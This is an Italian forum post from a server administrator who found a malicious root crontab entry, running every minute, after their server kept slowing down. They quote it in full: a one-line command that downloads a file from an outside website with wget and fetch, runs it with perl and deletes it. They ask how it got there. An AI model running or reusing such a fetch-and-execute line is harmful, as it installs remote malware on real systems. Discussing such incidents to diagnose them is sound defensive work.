Salve a tutti,

stamattina ho trovato il server fermo... non capivo il motivo e ho chiesto il riavvio manuale per vedere cosa fosse successo ma niente... tutto sembrava normale. Poi, dopo un paio d'ore, ha ricominciato a rallentarsi fino a che non ho dovuto richiedere il riavvio manuale.
Dopo circa 4 ore di ricerche ho trovato questo comando nel crontab eseguito ongni minuto e tutti i crontab impostati eliminati:

cd /etc/ppp;wget htph.com/.jpg/x;fetch http://htph.com/.jpg/x;perl x;rm -rf x*

htph.com ... è un sito di veterinari... che non centra un cavolo conil nostro lavoro...
Qualcuno ha idea che cosa faccia 'sto comando.. e soprattutto come diamine ha fatto ad arrivare nel crontab.. come ROOT?!!!! (qualcuno mi suggerirà di cambiare la password... ma vorrei capire come faccio a sapere da dove è arrivato)

Grazie a tutti.